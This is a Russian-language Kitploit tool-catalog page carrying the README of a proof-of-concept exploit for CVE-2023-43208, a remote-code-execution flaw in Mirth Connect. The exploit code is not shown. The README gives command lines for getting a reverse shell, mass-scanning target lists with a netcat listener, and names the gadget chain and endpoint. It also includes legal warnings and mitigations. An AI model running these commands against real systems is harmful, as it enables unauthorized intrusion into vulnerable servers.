Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
PoC-2023-43208 — Эксплойт доказательства концепции для CVE-2023-43208, уязвимости удаленного выполнения кода в Mirth Connect до версии 4.4.1. | Kitploit
Инструменты/GitHubGitHub/mkirahmet/poc-2023-43208
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеОбучение и ОбразованиеЛаборатории и Практика
GitHubmkirahmet/poc-2023-43208

PoC-2023-43208

Эксплойт доказательства концепции для CVE-2023-43208, уязвимости удаленного выполнения кода в Mirth Connect до версии 4.4.1.

Репозиторий
35 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2023-43208-EXPLOIT

Mirth Connect Удаленное выполнение кода (RCE) Эксплойт

Python Version Version CVE Lab Use Only

⚠️ ТОЛЬКО ДЛЯ ОБРАЗОВАТЕЛЬНЫХ И ЛАБОРАТОРНЫХ ЦЕЛЕЙ ⚠️

Доказательство концепции эксплойта для CVE-2023-43208, уязвимости удаленного выполнения кода в Mirth Connect до версии 4.4.1.

🚨 ВАЖНОЕ ЮРИДИЧЕСКОЕ ПРЕДУПРЕЖДЕНИЕ

Этот инструмент строго предназначен для:

  • 🧪 Образовательных целей
  • 🔬 Авторизованного тестирования безопасности в лабораторных средах
  • 📚 Исследований и обучения в области кибербезопасности

НЕ ИСПОЛЬЗУЙТЕ:

  • ❌ Против систем, которые вам не принадлежат
  • ❌ Без явного письменного разрешения
  • ❌ В производственных средах
  • ❌ Для незаконных или вредоносных целей

Вы несете ответственность за соблюдение всех применимых законов и нормативных актов. Неправильное использование этого инструмента может привести к уголовному преследованию.

📋 Описание

Этот эксплойт нацелен на уязвимость десериализации XML в конечной точке /api/users Mirth Connect, позволяющую неаутентифицированное удаленное выполнение кода на уязвимых версиях (< 4.4.1).

Это КРИТИЧЕСКАЯ уязвимость, и ее следует ТЕСТИРОВАТЬ ТОЛЬКО в изолированных лабораторных средах на собственных системах.

🔧 Требования

  • Python 3.7 или выше
  • Необходимые пакеты, перечисленные в requirements.txt
  • ЛАБОРАТОРНАЯ СРЕДА с уязвимым экземпляром Mirth Connect

🚀 Установка

Клонирование репозитория

git clone https://github.com/M0h4/CVE-2023-43208-EXPLOIT.git cd CVE-2023-43208-EXPLOIT

Установка зависимостей

pip install -r requirements.txt

💻 Использование (ТОЛЬКО ДЛЯ ЛАБОРАТОРИИ)

Интерактивный режим (рекомендуется для лаборатории)

root@kitploit:~
python exploit.py

Режим командной строки

root@kitploit:~
# Эксплуатация одной цели (ТОЛЬКО ДЛЯ ЛАБОРАТОРИИ)
python exploit.py -u https://target:8443 -lh 10.10.14.5 -lp 4444

# Сканирование нескольких целей из файла (ТОЛЬКО ДЛЯ ЛАБОРАТОРИИ)
python exploit.py -f targets.txt -t 50 -o vulnerable.txt

# Неинтерактивный режим (ТОЛЬКО ДЛЯ ЛАБОРАТОРИИ)
python exploit.py -u https://target:8443 -lh 10.10.14.5 -lp 4444 --no-interactive

Параметры

root@kitploit:~
-u, --url       URL-адрес цели для эксплуатации (ТОЛЬКО ДЛЯ ЛАБОРАТОРИИ)
-lh, --lhost    Прослушивающий хост (ваш IP)
-lp, --lport    Прослушивающий порт
-f, --file      Файл со списком URL-адресов целей для сканирования
-o, --output    Выходной файл для сохранения результатов сканирования
-t, --threads   Количество потоков для сканирования (по умолчанию: 50)
--no-interactive Запуск в неинтерактивном режиме

🎯 Пример лабораторной среды

Настройте свою лабораторию:

  1. Установите уязвимую версию Mirth Connect (< 4.4.1) в изолированной виртуальной машине
  2. Используйте контролируемую сеть (например, NAT/Только хост в VirtualBox/VMware)
  3. Никогда не подвергайте воздействию интернета

Запустите свой слушатель:

root@kitploit:~
ncat -lnvp 4444
# или
nc -lnvp 4444

Запустите эксплойт в своей лаборатории:

root@kitploit:~
python exploit.py -u https://192.168.1.100:8443 -lh 192.168.1.50 -lp 4444

🧪 Требования к тестовой среде

  • Изолированная сеть/VLAN
  • Только виртуальные машины
  • Нет производственных данных
  • Правила брандмауэра, блокирующие внешний доступ
  • Надлежащая авторизация задокументирована

📝 Технические детали

  • Тип уязвимости: RCE через десериализацию XML
  • Затронутые версии: Mirth Connect < 4.4.1
  • Исправленная версия: 4.4.1 и выше
  • Оценка CVSS: 9.8 (Критическая)
  • Вектор атаки: Сеть
  • Требуется аутентификация: Нет

Эксплойт использует гаджеты Commons Collections для достижения RCE через конечную точку /api/users.

🛡️ Меры защиты

Если вы используете Mirth Connect:

✅ Обновитесь до версии 4.4.1 или выше

✅ Ограничьте сетевой доступ к интерфейсам администратора

✅ Внедрите надлежащую аутентификацию

✅ Отслеживайте подозрительные XML-полезные нагрузки

👥 Авторы

  • Оригинальные авторы: K3ysTr0K3R & Chocapikk
  • Модифицировано: M0h4
  • CVE: CVE-2023-43208

⚠️ ФИНАЛЬНОЕ ПРЕДУПРЕЖДЕНИЕ

root@kitploit:~
╔══════════════════════════════════════════════════════════════╗
║  ЭТОТ ИНСТРУМЕНТ ТОЛЬКО ДЛЯ ЛАБОРАТОРНОГО ИСПОЛЬЗОВАНИЯ     ║
║  Несанкционированное использование НЕЗАКОННО и НЕЭТИЧНО      ║
║  Вы принимаете ВЕСЬ риск и ответственность                    ║
║  Автор не несет НИКАКОЙ ответственности за неправильное      ║
║  использование                                                ║
╚══════════════════════════════════════════════════════════════╝
Скачать инструмент